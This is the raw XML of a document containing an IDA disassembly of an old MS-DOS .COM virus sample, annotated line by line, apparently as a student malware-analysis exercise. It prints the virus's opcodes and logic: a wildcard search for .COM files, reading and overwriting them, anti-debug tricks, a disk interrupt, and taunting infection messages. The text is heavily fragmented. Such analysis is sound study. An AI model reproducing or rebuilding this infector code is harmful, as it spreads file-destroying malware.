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3.280029296875" w:line="240" w:lineRule="auto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sz w:val="15.999999046325684"/>
          <w:szCs w:val="15.99999904632568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+-------------------------------------------------------------------------+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| This file was generated by The Interactive Disassembler (IDA) |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| Copyright (c) 2019 Hex-Rays, &lt;support@hex-rays.com&gt; |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| License info: 48-3051-7114-0E |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| LSU (Louisiana State University), Academic licenses |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+-------------------------------------------------------------------------+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3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414" w:right="1148.2299804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5.009765625" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414" w:right="796.870117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Input SHA256 : 7E00694397CBB7B422CB2F3E39A34C7FB7554931A1A9A2CF9AE7B2BCF42296E3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5.009765625" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414" w:right="796.870117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Input MD5 : 0B4A318803AA1B9B6A0DCC55CEFCB7CE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Input CRC32 : 785762D7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File Name : C:\Users\golden\Downloads\dos7-sample (1)\Dos7.com.com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Format : MS-DOS COM-file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5.009765625" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414" w:right="2465.83007812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Base Address: 1000h Range: 10100h-102C8h Loaded length: 1C8h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5.009765625" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414" w:right="2465.83007812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 xml:space="preserve">.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686p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.mmx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.model tiny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===========================================================================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Segment type: Pure code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seg000 </w:t>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">segment byte public 'CODE' use16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cs:seg000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org 100h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3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414" w:right="882.6501464843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es:nothing, ss:nothing, ds:seg000, fs:nothing, gs:nothing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.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414" w:right="882.65014648437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public start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C7 06 07 01 52 01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word ptr loc_10106+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152h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152 into 16-bit ptr loc_106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seg000:0106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3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414" w:right="1845.7989501953125" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="8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seg000:0106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loc_10106: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00"/>
          <w:sz w:val="15.999999046325684"/>
          <w:szCs w:val="15.999999046325684"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">; DATA XREF: seg000:startâ†‘w</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="8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3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414" w:right="1845.7989501953125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B8 68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168h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168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.009765625" w:line="237.4049949645996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seg000:0109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A3 2E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mov </w:t>
        <w:tab/>
        <w:t xml:space="preserve">word ptr loc_10129+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, ax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ax (168) into 16-bit ptr loc_129</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="5.009765625" w:line="237.4049949645996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2B C0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ax,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clear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1E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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">ds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push ds onto stack, preserve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seg000:010F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8E D8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ds,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ax (0) value into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seg000:0111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ds:nothing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8E C0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es,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ax (0) value into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seg000:0113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es:nothing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BE 84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si,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84h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'â€ž'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84 into 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0C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0Ch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0C into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A5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movsw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ds:si -&gt; es:di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seg000:011A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A5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movsw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ds:si -&gt; es:di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seg000:011B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26 A1 00 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mov </w:t>
        <w:tab/>
        <w:t xml:space="preserve">ax, es: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0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es:0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seg000:011F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A3 70 01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170h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ax (es:0) into ds:170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seg000:0122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26 A1 02 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es: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es:2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seg000:0126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A3 77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177h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 xml:space="preserve">; move ax (es:2) ds:177</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000033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seg000:0129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3.280029296875" w:line="237.40423679351807" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414" w:right="1933.638916015625" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="8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seg000:0129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loc_10129: </w:t>
        <w:tab/>
        <w:tab/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="808000"/>
          <w:sz w:val="15.999999046325684"/>
          <w:szCs w:val="15.999999046325684"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">; DATA XREF: seg000:0109â†‘w</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="8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3.280029296875" w:line="237.40423679351807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seg000:0129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26 C7 06 00 00 4C 4D </w:t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word ptr es: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4D4Ch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4D4Ch into 16-bit ptr es:0</w:t>
        <w:tab/>
        <w:tab/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1F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pop </w:t>
        <w:tab/>
        <w:t xml:space="preserve">ds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pop ds from stack, stack clear, ds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seg000:0131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ds:seg000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8C D8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ds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ds (seg000)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80 C4 10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add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10h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add 10h to ah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26 A3 02 00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es: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ax into es:2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seg000:013A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8E C0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es,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ax into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es:nothing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00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100h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100h into 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seg000:013F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F7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si, di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di into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B9 A3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1A3h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1A3h into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F3 A4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rep </w:t>
        <w:tab/>
        <w:t xml:space="preserve">movsb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repeat move byte from ds:si -&gt; es:di cx (419) times</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040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 cx becomes 0 (cx - - for each movsb)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041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8E D8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ds,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ax into ds (save ax?)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seg000:0148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ds:nothing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F7 F1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div </w:t>
        <w:tab/>
        <w:t xml:space="preserve">cx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cx = 0, ax = seg000, divide by 0 occurs (ax / 0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044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ab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">; at beginning of start, 152 and 168 are saved to word ptr 106 and 129 respectively</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046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ab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">; data is manipulated and move around, and a divide by 0 occurs at seg000:0148 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047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seg000:014A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before="3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414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seg000:014A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loc_1014A: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seg000:01ABâ†“j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seg000:014A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3E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3Eh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'&gt;'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3Eh “close file referenced by file handler” on int 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.01007080078125" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414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3 is an interrupt 21h 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.01007080078125" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414" w:right="2636.35864257812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seg000:014D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5.01007080078125" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414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seg000:014D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loc_1014D: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seg000:0195â†“j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before="5.01007080078125" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414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seg000:014D </w:t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seg000:01A5â†“j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before="5.0099945068359375" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414" w:firstLine="0"/>
        <w:rPr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seg000:014D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4F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4Fh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'O'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4Fh “fine next matching file” on int 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03.27880859375" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414" w:right="2636.35864257812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seg000:014F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03.27880859375" w:line="237.4049949645996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EB 3A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jmp </w:t>
        <w:tab/>
        <w:t xml:space="preserve">short loc_1018C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jump to loc_1018C, seg000:018C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5.00976562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seg000:0152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spacing w:before="5.009765625" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414" w:right="1148.22998046875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2B C9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cx, cx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clear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seg000:0154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before="3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414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seg000:0154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loc_10154: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seg000:0166â†“j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41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inc </w:t>
        <w:tab/>
        <w:t xml:space="preserve">cx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increment cx (cx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0E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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">cs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push cs onto stack, preserving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07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pop </w:t>
        <w:tab/>
        <w:t xml:space="preserve">es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pop es, es = cs, es =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seg000:0157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es:seg000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seg000:0157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spacing w:before="3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414" w:right="1933.638916015625" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ff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seg000:0157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loc_10157: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ff0000"/>
          <w:sz w:val="15.999999046325684"/>
          <w:szCs w:val="15.999999046325684"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">; CODE XREF: seg000:015Aâ†“j</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="ff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3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414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seg000:0157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B8 05 FE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0FE05h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0FE05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.00976562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seg000:015A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EB FC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jmp </w:t>
        <w:tab/>
        <w:t xml:space="preserve">short near ptr loc_10157+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jump short near to ptr loc_10157 offset 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414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 file referenced by file handler is closed, and a “find next matching file” int 21h executes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F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 ex is manipulated through the stack, with a value set to 1?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060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 assume es:seg000 occurs??</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000061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seg000:015C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2D 02 E7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0E702h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subtract 0E702h from ax (0FE05h?)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seg000:015F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B7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bh,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  <w:tab/>
        <w:t xml:space="preserve">; mov 1 into bh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000065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BA 00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 0 into dx (read hard drive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.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1.1596679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seg000:0164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CD 13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13h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DISK - SET MEDIA TYPE FOR FORMAT (AT model 3x9,X </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000067">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1.15966796875" w:firstLine="0"/>
        <w:jc w:val="both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seg000:0164 </w:t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DL = drive number, CH = lower 8 bits of number o </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000068">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1.15966796875" w:firstLine="0"/>
        <w:jc w:val="both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EB EC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jmp </w:t>
        <w:tab/>
        <w:t xml:space="preserve">short loc_10154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jump to loc_10154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5.009765625" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0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seg000:0168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spacing w:before="5.009765625" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1148.22998046875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06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es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push es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51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cx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push cx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seg000:016A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07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pop es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pop es, es =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seg000:016B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es:nothing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seg000:016B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26 C7 06 00 00 4C 4D </w:t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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">word ptr es: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4D4Ch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 4D4Ch into 16-bit ptr es:0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seg000:0172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26 C7 06 02 00 41 53 </w:t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word ptr es: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5341h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 5341h into 16-bit es:2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seg000:0179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07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pop </w:t>
        <w:tab/>
        <w:t xml:space="preserve">es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pop es (es wasn’t on stack?)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seg000:017A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C7 06 07 01 68 01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word ptr ds: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107h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168h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value 168h into ds:107h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.278808593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1A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1Ah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1Ah into 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99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cwd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convert word to doubleword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  <w:t xml:space="preserve">; Trap To Debugger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000075">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="5903.737525939941" w:right="0" w:firstLine="576.2624740600586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21h, function 1Ah “set disk transfer area (DTA)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4E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4Eh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int 21h function 4Eh “find first matching file”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2B C9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cx, cx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clear cx (search attributes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078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seg000:0188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BA 23 02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mov </w:t>
        <w:tab/>
        <w:t xml:space="preserve">dx,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223h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 223h into dx, setting pointer attribute to </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000079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 seg000:223 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="2636.358642578125" w:firstLine="0"/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  <w:t xml:space="preserve">; Trap To Debugger</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="5903.737525939941" w:right="2636.358642578125" w:firstLine="576.2624740600586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21h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C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ab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">; here we are setting the carry flag for upcoming jb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007D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; interesting thing here, int 21h is called with function 4Eh, “find first matching file”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F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ab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">; before this call, ds:dx, or “pointer to ASCIIZ filename (with attributes) is set seg000:223</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080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ab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">; located at seg000:223 is a | db '*W.C?M',0 | execution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414" w:right="0" w:firstLine="0"/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ab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">; this means that the pointer for 4E is set to a .com file by using the obfuscated wildcard-laden search</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="2636.35864257812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seg000:018C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before="5.009765625" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0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seg000:018C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loc_1018C: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seg000:0150â†‘j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5.009765625" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0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72 7E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jb </w:t>
        <w:tab/>
        <w:t xml:space="preserve">short loc_1020C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 xml:space="preserve">; jump if below 0 (.com file missing)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000085">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="5.009765625" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414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5.009765625" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414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seg000:018E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B8 02 3D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3D02h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3D02h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BA 1E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1Eh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1Eh into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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="5903.737525939941" w:right="0" w:firstLine="576.2624740600586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21h, ah = 4Eh “find first matching file”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B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 int 21h with function 4Eh searches given param seg000:1E</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008C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72 B6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jb </w:t>
        <w:tab/>
        <w:t xml:space="preserve">short loc_1014D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; jump if below 0 (.com file missing?)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008D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seg000:0197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D8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bx,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3D02h into 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3F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3Fh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'?'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function 3Fh “read from file referenced by file handle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008F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1A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1Ah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1Ah into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seg000:019E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0D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[di]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set cx to address value of di (1Ah)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D6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dx, si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si (100h) into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 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000095">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3.280029296875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="5903.737525939941" w:firstLine="576.2624740600586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21h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000096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 int 21h here uses:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000097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</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">3Fh : read from a file or device</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000098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</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">bx = 3D02h : file handle</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000099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</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">cx = address value of 1Ah</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009A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 xml:space="preserve">;</w:t>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">ds:dx = seg000:100h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009B">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3.280029296875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="143.7375259399414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9C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04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[si]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set ax to address value of si (100h)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72 A6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jb </w:t>
        <w:tab/>
        <w:t xml:space="preserve">short loc_1014D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int 21h function 4Fh if CF = 0 (successful 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seg000:01A7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3B 06 00 01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cmp </w:t>
        <w:tab/>
        <w:t xml:space="preserve">ax, ds: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100h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compare ds:100h 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74 9D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jz </w:t>
        <w:tab/>
        <w:t xml:space="preserve">short loc_1014A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jump if zero to “close file” int 21h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seg000:01AD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44 02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[si+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 [si+2] (102h)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3D 15 60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cmp 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6015h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74 02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jz </w:t>
        <w:tab/>
        <w:t xml:space="preserve">short loc_101B7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 xml:space="preserve">; jump if zero to seg000:01B7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EB 3F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jmp </w:t>
        <w:tab/>
        <w:t xml:space="preserve">short loc_101F6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fallback jump to seg000:01F6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seg000:01B7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seg000:01B7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widowControl w:val="0"/>
        <w:spacing w:before="5.01007080078125" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0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seg000:01B7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loc_101B7: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seg000:01B3â†‘j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before="5.01007080078125" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="1933.638916015625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seg000:01B7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57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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">di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push di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5.010070800781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56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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">si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 xml:space="preserve">; push si onto stack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A9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BE 4D 02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si,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24Dh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start of new message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3.280029296875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="5903.737525939941" w:firstLine="576.2624740600586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MSDOS 7 (C)1993 ANARKICK SYSTEMS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AB">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="199.92000102996826" w:lineRule="auto"/>
        <w:ind w:left="5760" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0000ff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;  ☺☺☺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DOS 6 Antivirus sucks. It missed this one!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F0 23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23F0h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default message storage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seg000:01BF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B9 55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55h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'U'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length of transferred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90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nop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No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cld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clear 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F3 A4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rep </w:t>
        <w:tab/>
        <w:t xml:space="preserve">movsb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overwrite default message at 23F0h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BE 2A 02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si,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22Ah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start of new message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2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ab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">; is infected!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B3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57 90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9057h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default message storage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B9 0C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0Ch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length of transferred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seg000:01CF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90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nop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No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F3 A4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rep</w:t>
        <w:tab/>
        <w:t xml:space="preserve">movsb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overwrite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BE 36 02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si,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236h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start of new message</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B8">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3.280029296875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="5760" w:firstLine="72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oy, are you ever dumb!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4C 91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914Ch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default message storage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3.280029296875" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr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B9 17 00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17h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length of transferred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90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nop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No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F3 A4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rep </w:t>
        <w:tab/>
        <w:t xml:space="preserve">movsb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overwrite </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000BD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seg000:01DE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B8 00 42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4200h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4200h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2B D2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dx, dx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clear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CA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dx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clear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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="3.280029296875" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="5760" w:right="2812.03857421875" w:firstLine="72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int 21h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40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40h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'@'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function 40h “Write To A File Or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BA A3 02</w:t>
        <w:tab/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dx,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2A3h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seg000:buffer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B9 BD CE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0CEBDh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write CEBDh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 int 21h</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C9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seg000:01EF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3E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3Eh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'&gt;'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function 3Eh “Close A File Handle”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5.00976562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seg000:01F1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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="5.009765625" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="5760" w:right="2812.03857421875" w:firstLine="72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int 21h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widowControl w:val="0"/>
        <w:spacing w:before="5.009765625" w:line="237.4049949645996" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="2812.03857421875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5E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pop </w:t>
        <w:tab/>
        <w:t xml:space="preserve">si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pop si from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5F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pop </w:t>
        <w:tab/>
        <w:t xml:space="preserve">di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 xml:space="preserve">; pop di from stack, stack clear</w:t>
      </w:r>
    </w:p>
